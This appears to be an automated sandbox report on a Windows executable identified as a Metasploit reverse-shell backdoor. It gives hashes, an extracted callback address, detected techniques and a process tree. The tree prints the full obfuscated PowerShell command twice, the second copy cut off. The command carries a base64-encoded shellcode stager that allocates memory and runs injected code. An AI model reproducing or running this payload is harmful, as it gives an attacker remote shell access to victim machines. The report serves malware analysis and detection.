metasploit | ba74372bf0cde1e482d41913d4efe770c403d012bee38bdba307b4d0c18cdeff

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe
Size

86KB
MD5

a33f65fcb17f7c5789abcbd1b1631427
SHA1

9851d7213770730412dbf0a8056fc99c04e0378b
SHA256

ba74372bf0cde1e482d41913d4efe770c403d012bee38bdba307b4d0c18cdeff
SHA512

3ff6f875cce369f7267d3a55a0f0ff19c8cfa190126783902737891378601d4fcb334007ecbd2b56916b9b2019a1a0912d3bd467501dd37b873a624dce061d1a
SSDEEP

1536:2iv/NzFqFyRPCsLBPi6EczQVC3RbwSzKQ589g4SNRLXWlrRfgS:2MUqFLIddpQ5899S2dv

Score

10^/10

metasploit backdoor discovery trojan

Malware Config

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

192.168.234.134:2094

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1908	powershell.exe
2380	powershell.exe
2840	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2912	3052	a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe	30
PID 3052 wrote to memory of 2912	3052	a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe	30
PID 3052 wrote to memory of 2912	3052	a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe	30
PID 3052 wrote to memory of 2912	3052	a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe	30
PID 2912 wrote to memory of 1428	2912	mshta.exe	31
PID 2912 wrote to memory of 1428	2912	mshta.exe	31
PID 2912 wrote to memory of 1428	2912	mshta.exe	31
PID 2912 wrote to memory of 1428	2912	mshta.exe	31
PID 1428 wrote to memory of 1908	1428	cmd.exe	33
PID 1428 wrote to memory of 1908	1428	cmd.exe	33
PID 1428 wrote to memory of 1908	1428	cmd.exe	33
PID 1428 wrote to memory of 1908	1428	cmd.exe	33
PID 1908 wrote to memory of 2380	1908	powershell.exe	34
PID 1908 wrote to memory of 2380	1908	powershell.exe	34
PID 1908 wrote to memory of 2380	1908	powershell.exe	34
PID 1908 wrote to memory of 2380	1908	powershell.exe	34
PID 2380 wrote to memory of 2840	2380	powershell.exe	35
PID 2380 wrote to memory of 2840	2380	powershell.exe	35
PID 2380 wrote to memory of 2840	2380	powershell.exe	35
PID 2380 wrote to memory of 2840	2380	powershell.exe	35
PID 2840 wrote to memory of 2512	2840	powershell.exe	36
PID 2840 wrote to memory of 2512	2840	powershell.exe	36
PID 2840 wrote to memory of 2512	2840	powershell.exe	36
PID 2840 wrote to memory of 2512	2840	powershell.exe	36
PID 2512 wrote to memory of 2664	2512	csc.exe	37
PID 2512 wrote to memory of 2664	2512	csc.exe	37
PID 2512 wrote to memory of 2664	2512	csc.exe	37
PID 2512 wrote to memory of 2664	2512	csc.exe	37

C:\Users\Admin\AppData\Local\Temp\a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a33f65fcb17f7c5789abcbd1b1631427_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\{7CB48A1E-B887-4AEA-8CD5-2785DFE8E7DC}\18.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell -w 1 -C "sv X -;sv xp ec;sv I ((gv X).value.toString()+(gv xp).value.toString());powershell (gv I).value.toString() 'JABvAEQAIAA9ACAAJwAkAFMAYgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFEAcQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB5AFcAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAA5ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABkADIALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOABiACwAMAB4ADQAMAAsADAAeAA3ADgALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANQAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAZQAzACwAMAB4ADMAYwAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADIALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAYgAsADAAeAA4ADYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeABlAGEALAAwAHgAMABmACwAMAB4AGQAZgAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADcALAAwAHgANgBhACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAYwAwACwAMAB4AGEAOAAsADAAeABlAGEALAAwAHgAOAA2ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAMAAwACwAMAB4ADAAOAAsADAAeAAyAGUALAAwAHgAOAA5ACwAMAB4AGUANgAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4ADMANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADgANQAsADAAeABmADYALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeABjADMAOwAkAEsAYQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB5AFcALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASwBhACAAPQAgACQAeQBXAC4ATABlAG4AZwB0AGgAfQA7ACQASQBTAGIAPQAkAFEAcQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAEsAYQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAFcAbAA9ADAAOwAkAFcAbAAgAC0AbABlACAAKAAkAHkAVwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABXAGwAKwArACkAIAB7ACQAUQBxADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASQBTAGIALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBsACkALAAgACQAeQBXAFsAJABXAGwAXQAsACAAMQApAH0AOwAkAFEAcQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASQBTAGIALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABvAEQAKQApADsAJABTAGIAUQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABWAEsAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVgBLACAAJABTAGIAUQAgACQASQBTACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFMAYgBRACAAJABJAFMAIgA7AH0A'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w 1 -C "sv X -;sv xp ec;sv I ((gv X).value.toString()+(gv xp).value.toString());powershell (gv I).value.toString() 'JABvAEQAIAA9ACAAJwAkAFMAYgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFEAcQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB5AFcAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAA5ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABkADIALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOABiACwAMAB4ADQAMAAsADAAeAA3ADgALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANQAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAZQAzACwAMAB4ADMAYwAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADIALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAYgAsADAAeAA4ADYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeABlAGEALAAwAHgAMABmACwAMAB4AGQAZgAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADcALAAwAHgANgBhACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAYwAwACwAMAB4AGEAOAAsADAAeABlAGEALAAwAHgAOAA2ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAMAAwACwAMAB4ADAAOAAsADAAeAAyAGUALAAwAHgAOAA5ACwAMAB4AGUANgAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4ADMANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADgANQAsADAAeABmADYALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeABjADMAOwAkAEsAYQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB5AFcALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASwBhACAAPQAgACQAeQBXAC4ATABlAG4AZwB0AGgAfQA7ACQASQBTAGIAPQAkAFEAcQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAEsAYQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAFcAbAA9ADAAOwAkAFcAbAAgAC0AbABlACAAKAAkAHkAVwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABXAGwAKwArACkAIAB7ACQAUQBxADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASQBTAGIALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBsACkALAAgACQAeQBXAFsAJABXAGwAXQAsACAAMQApAH0AOwAkAFEAcQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASQBTAGIALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABvAEQAKQApADsAJABTAGIAUQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAH